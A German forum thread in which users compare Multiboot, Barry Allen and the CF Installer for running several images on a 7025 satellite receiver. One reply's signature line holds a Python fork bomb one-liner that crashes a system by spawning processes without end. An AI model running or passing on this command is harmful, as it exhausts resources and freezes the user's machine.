Multiboot - Barry Allen - CF Installer was soll ich nehmen?

• Multiboot - Barry Allen - CF Installer was soll ich nehmen?

Hallo,

Bis jetzt habe ich auf meiner 7025 immer Multiboot verwendet und war damit eigentlich sehr zufrieden.
      Nur scheint sich Multiboot seit der Ver. 2.3 nicht mehr mit Newnigma2 zu vertragen. (Bitte mich korrigieren falls das nicht stimmt)

Hier im Forum wird meist Barry Allen verwendet. Ist das eigentlich eine Weiterentwicklung von Multiboot oder eine völlig eigenständige Entwicklung?

Der große Vorteil von Multiboot war das immer das komplette Image gebootet wurde währen bei BA der Kernel vom Orginal Image genommem wird.

Soweit ich das begriffen habe ist der CF Installer auch kein Bootmanager sondern eher eine "Speichererweiterung".

Funktioniert jetzt Multiboot noch oder muss ich BA nehmen wenn ich mehrere Images gleichzeitig haben will?
      --------
      LieGrü
    • Der CF Installer hatt nix mit multiboot zutun der installiert nur das image vom flash in den cf der dann komplett unabhängig vom image im flash läuft. Der cf hatt dann seinen eigenen kernel usw.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Wenn man nicht mehrere Images braucht, was eigentlich normal sein sollte, denn man nutzt ja nicht zum sehen das Image und zum Aufnehmen jenes Image usw., dann ist der CF installer vorzuziehen. Denn beim CF Installer ist, wie schon gesagt, das gesamte Image auf dem CF und es gibt keine Probleme, wie mit BA, dass das Image im Flash mit dem im CF passen muss (Kernel und Treiber).